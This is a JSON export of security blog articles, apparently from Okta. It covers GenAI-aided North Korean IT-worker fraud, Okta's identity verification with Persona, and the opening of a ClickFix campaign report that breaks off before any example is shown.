\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/opa/pr/two-north-korean-nationals-and-three-facilitators-indicted-multi-year-fraudulent-remote\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025 indictment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", two US residents were accused of fraudulently obtaining employment and operating a laptop farm in North Carolina for DPRK nationals, after they’d successfully gained employment at 64 organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta can now reveal for the first time the degree to which facilitators of fraudulent work schemes rely on emerging GenAI-enhanced services to scale their operations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can read a comprehensive report into DPRK IT Worker fraud at the Okta Security Trust Center.\\nPrimary Security Contacts can sign-in to access threat advisories at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-enhanced tools\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, individuals strongly suspected to be DPRK-created personas \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.vidocsecurity.com/blog/deepfake-fraud-2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"have been recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using real-time “deepfake” video during interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence research has observed a far broader set of GenAI services used in these schemes, suggesting a very deliberate attempt by facilitators to keep pace with AI innovation. Facilitators are now using GenAI-based tools to optimize every step in the process of applying and interviewing for roles and to aid DPRK nationals attempting to maintain this employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using GenAI-based services specializing in:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unified messaging\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recruitment platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Resume/CV screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidate management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automated job screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-based chatbots\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI code training\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Online shipping\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Threat Intelligence is not able to observe the facilitators’ activities beyond the login page, the narrow range of functionality offered by many of these tools allows us to hypothesize on some likely use cases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Unified messaging\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most demanding challenges for facilitators is how to manage multi-channel communications on behalf of dozens of candidates from sanctioned countries and their multiple personas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed the use of unified messaging services to manage many simultaneous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”. These GenAI-enhanced services are required to manage the scheduling of job interviews with multiple DPRK candidate personas by a small cadre of facilitators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI in everything from tools that transcribe or summarize conversations, to real-time translation of voice and text.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Recruitment platforms\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators and candidates both make extensive use of jobseeking platforms to apply for roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More surprising was the use of AI-enhanced recruitment platforms typically used by recruiters (not candidates) to amplify the reach and accuracy of job postings.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to these tools provides facilitators opportunities to advertise roles at front companies that are similar, if not identical, to those advertised by targeted organizations, in order to study the cover letters and resumes of legitimate candidates. The CVs and cover letters from legitimate jobseekers may even form part of a training set for optimizing future applications made on behalf of DPRK nationals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These same recruitment platforms provide access to the same applicant vetting systems (ATS) real employers use to narrow down the number of job applications a recruiter or hiring manager needs to manually review. Posting fake job advertisements would allow facilitators to examine what features presented in a job application are most likely to result in these AI-enhanced algorithms selecting a particular candidate over others. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At scale, these techniques dramatically improve the potential success of job applications, effectively using the recruiters own tools against them at scale.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Resume/CV screening\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that facilitators are highly motivated to generate successful cover letters, CVs and interviews and address any specific criteria in a given application. \\n\\nFacilitators were observed making use of services that provide “AI Superpowers” to job applicants to help them “outsmart employers’ robots”, in order to improve the chances of a job application successfully progressing past the automated CV/resume scans used in recruiting platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI agents to test uploaded CVs against ATS (applicant tracking software), iterating until they achieve a better result and learning which personas will be more successful in any given role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Candidate management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed services that use GenAI agents to automate the process of filling in application forms on behalf of candidates and to track the progress of candidates through the application process. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, these capabilities address the challenge of facilitating job applications and employment on behalf of multiple individuals and their multiple personas over multiple timezones.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Mock interviews\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an application is successful, the next task for facilitators is to prepare their candidates (or the facilitator themselves, in some cases) for job interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using AI-enhanced services that deploy GenAI agents to host and record first-round interviews on behalf of employers, then critique and offer improvement tips for the interviewee. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated “AI-based webcam interview review” services claim to assist with the appropriate use of lighting, video filters, lighting and the candidate’s approach to conversation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that mock interviews staged by AI agents can be used to evaluate the efficacy of deepfake overlays and of highly scripted answers to common questions, to decrease the chance of their ruse being discovered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. LLM-based chatbots\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While most of the GenAI applications used by facilitators relate directly to training and recruitment, Okta Threat Intelligence also observed them constantly signing into generic chatbots powered by large language models (LLMs).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Analyzing patterns of activity, these GenAI tools appear to be relied on heavily throughout the recruitment process, as well as by successful candidates once they gain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Code training services\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidates were also observed signing into free services that offer training in specific development languages and AI tools. These training platforms deliver a cursory awareness of unfamiliar development skills required by a hiring organization at interview, and the bare essentials required to maintain employment for as long as possible.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In short, DPRK facilitators are AI’s “power users”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By extensively employing AI-enhanced tools, facilitators enable minimally skilled, non-native English-speaking workers to maintain software engineering positions long enough to channel earnings towards the sanctioned DPRK regime. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The scale of observed operations suggests that even short-term employment for a few weeks or months at a time can, when scaled with automation and GenAI , present a viable economic opportunity for the DPRK. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To mitigate the threat posed by these campaigns, Okta Threat Intelligence recommends:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"key business processes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Training staff to identify common indicators of fraudulent behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting the unauthorized use of RMM (remote management and monitoring) tools\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of recommendations and detection methods by selecting \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liam Dermody, Tim Peel, Alex Tilley and David Zielezna contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Nobody does GenAI quite like a fake IT worker."},"updatedAt":"2025-07-31T03:58:06.450Z","secAuthor":[{"id":"203ea27a-a295-5ec0-a53e-0ebe54e65cb9","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta Threat Intelligence","jobTitle":null,"slug":"/hackers/oti","node_locale":"en"}]},{"slug":"/articles/2025/02/how-okta-embraces-identity-verification-using-persona","id":"d338fe49-dc77-5ecd-a51e-56cc84e009ed","title":"How Okta Embraces Identity Verification Using Persona","date":"2025-02-05T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With remote work becoming the norm, today’s organizations face a critical challenge: ensuring that users accessing their systems and data are in fact who they claim to be. Given our highly distributed workforce here at Okta, we leverage \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://withpersona.com/contact?utm_term=persona&utm_campaign=RP_Search_Brand_US_CA_UK&utm_source=google&utm_medium=ppc&utm_content=710836266667&hsa_acc=5817921572&hsa_cam=21625765091&hsa_grp=166502542276&hsa_ad=710836266667&hsa_src=g&hsa_tgt=kwd-12277670&hsa_kw=persona&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAkoe9BhDYARIsAH85cDO64it9sNgNowxILci7dLdUvHKVk8PUr2cQetAgj-niK6_B4XEM0oQaAtqHEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" for Identity verification.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The threat landscape\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Given the current geopolitical environment, it is concerningly common for individuals to use fraudulent, or stolen Identities to apply for employment with highly targeted companies, especially in the cybersecurity industry. At best, these individuals do not have the purported skills and capabilities required for the role and can drain company resources. In the most extreme cases, the individuals may be from sanctioned countries and operate for malicious threat actors with the aim of generating income via ransomware attacks or acquiring sensitive, proprietary information with ill-natured intent.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As part of the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (OSIC), our long-term initiative to lead the industry in the fight against Identity attacks, we’re tackling this issue head-on with the introduction of Identity verification using Persona’s trusted technology. Internally, ID verification has been introduced as a compulsory component of our evolving onboarding process and secure account recovery activities.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Persona? \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s technology offers a unified Identity platform that provides businesses the building blocks they need to securely collect, verify, manage, and make informed decisions about individuals' and businesses' Identities. Okta leverages Persona’s industry-leading technology to securely protect access to online accounts by verifying government-issued identification and comparing it to live, attention-aware photographs to provide greater assurance that the person behind the access attempt is in fact who they're claiming to be.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In practice, Identity verification inquiries with Persona involve up-to-date, live photography capturing varying angles in addition to government-issued photo identification, where a series of validation activities are then performed to assess the veracity of the access attempt. Only once both the photographs and identification have passed a series of secure checks, will the individual have been deemed to “pass” the verification process and subsequently gain access to the controlled environment. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Positioned highest for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://withpersona.com/gartner-magic-quadrant?utm_term=persona&utm_campaign=RP_Search_Brand_US_CA_UK&utm_source=google&utm_medium=ppc&utm_content=710836266667&hsa_acc=5817921572&hsa_cam=21625765091&hsa_grp=166502542276&hsa_ad=710836266667&hsa_src=g&hsa_tgt=kwd-12277670&hsa_kw=persona&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAkoe9BhDYARIsAH85cDO64it9sNgNowxILci7dLdUvHKVk8PUr2cQetAgj-niK6_B4XEM0oQaAtqHEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Ability to Execute in the 2024 Gartner Magic Quadrant for Identity Verification\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Persona offers the following capabilities:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Collection, verification, enrichment and analysis of user information;\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Enablement of decision-making based on user information analysis; \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Integration of third-party data for additional insights; and \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Evaluation of behavioral risk signals and automation of decisions using customizable workflows.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s technology offers use case customization, allowing configuration for required or non-required validation. In Okta’s case, we’ve customized our Identity verification process to include country verification to ensure legal alignment to relevant restrictions, limiting the access of Okta’s products in jurisdictions where US import controls or economic sanctions laws are in effect.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona’s customizable options include enabling indicators of particular interest during an Identity challenge. This is a key capability for insider threat security teams who can for example, flag the face likeness of known malicious threat actors which can provide increased assurance to prevent repeated attempts to gain unauthorized access to critical company resources. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During initial testing of Persona’s capabilities, we found it to be both very effective at flagging a variety of identity-based attacks, while being nuanced enough to allow for benign inconsistencies which often occur with identifications and selfies, such as variation in the name order e.g. given names and surnames may be interchangeable. This means teams responsible spend less time working through false positives. Our ID proofing implementation journey has been one of ease, with Persona seamlessly integrating with our existing infrastructure and technology stack. Okta has fully-embedded the Persona widget into our workflows, enabling users to verify their identity without ending their Okta session. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"At 2024’s annual \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Oktane\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" conference, we \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane-2024-announcements/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"announced\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" a new ID proofing feature that allows customers to create Identity verification challenges during a workflow, as governed by their \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/oamp.htm#:~:text=The%20Okta%20account%20management%20policy%20defines%20authentication%20requirements%20when%20users,onboarding%20to%20authentication%20and%20recovery.\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Account Management Policy\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (OAMP). Through the introduction of this new feature, Okta is leveraging Persona’s technology to address two high-risk use cases where Identity verification is essential: employee onboarding and self-service account recovery.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with our efforts to \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"free everyone to safely use any technology\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", the introduction of mandatory ID proofing during onboarding increases the integrity, robustness and security of Okta’s new hire process. ID proofing aims to ensure the new hire is who they say they are, and that they are the same individual who has participated throughout the recruiting process.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Post-onboarding, using ID proofing for self-service account recovery offers higher assurance that a legitimate, authorized user is the one unlocking the user account in question. This in turn mitigates and reduces the risk of an impersonation attack. It also allows Okta’s technical support teams to spend less time manually performing account unlock activities for employees who find themselves locked out of their accounts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What’s next? \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persona is the first ID proofing vendor we’ve integrated with, here at Okta. We continue to prioritize Identity verification and validation for our workforce in addition to prioritized \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/phishing-resistance/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"phishing-resistant authentication\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re looking forward to exploring additional ID proofing integrations to tackle evolving Identity theft trends in our continued fight against Identity threats. Stay tuned as we continue to evolve our Identity verification capabilities, partnering with industry leaders to prioritize securing your systems and data.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Given the current geopolitical environment and remote work becoming a norm, it is increasingly common for individuals to use fraudulent, or stolen Identities to apply for employment with highly targeted companies, especially in the cybersecurity industry. This article details how Okta leverages Persona's technology for secure Identity verification."},"updatedAt":"2025-07-31T03:27:46.018Z","secAuthor":[{"id":"40d9f189-1eb3-54ae-bc99-a3b7b906cb55","bio":{"bio":"
Liam is the Director of Insider Threat at Okta, where he works across the company to reduce insider-related risk. A security specialist with over 15 years of diverse experience spanning analytical, technical, and leadership roles, Liam is dedicated to safeguarding critical assets. Working in both public and private sectors, he has successfully defended Government and industry against a broad range of national security threats, including malicious cyber actors, foreign interference, espionage, and politically-motivated violence.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5WuHbOEWREw1vzeG6cOdA7/5d7b13873a4a1c1823a9aac993edc163/ld.png"},"name":"Liam Dermody","jobTitle":"Director, Insider Threat","slug":"/hackers/liam-dermody","node_locale":"en"}]},{"slug":"/articles/2025/07/how-this-clickfix-campaign-leads-to-redline-stealer","id":"a0bb13d8-9d30-5e75-bc6b-9a09cd92c513","title":"How this ClickFix campaign leads to Redline Stealer","date":"2025-07-03T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An overwhelming share of the user credentials that are later abused in identity-based attacks arise from the compromise of unmanaged user devices. “Infostealers” are the generic name given to the class of malware designed primarily for this purpose in mind. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While infostealers are distributed via numerous means — with pirated games being high on the list — more recently, our analysts have observed malware being distributed using deceptively simple techniques: a ClickFix campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often referred to as a \\\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Prove You Are Human\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\\" campaign, a ClickFix campaign exploits user trust and problem-solving instincts to bypass conventional security measures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convincing a user to install malicious code\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the ClickFix attacks we’ve observed, attackers pay search engines to elevate their phishing pages when users search for the names of popular web applications. The sponsored link redirects the user to a website that impersonates the brand in question.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These deceptive pages will mimic legitimate security checks, such as CAPTCHA challenges that are used to prove whether a site visitor is interactive (vs a bot). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These fake CAPTCHA or verification-type overlays lend legitimacy to the subsequent instructions provided to the user. The page might even subtly mimic the background image used in a real CAPTCHA service to enhance its credibility further.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of a site impersonating a Cloudflare CAPTCHA challenge for a user attempting and expecting to visit Okta at 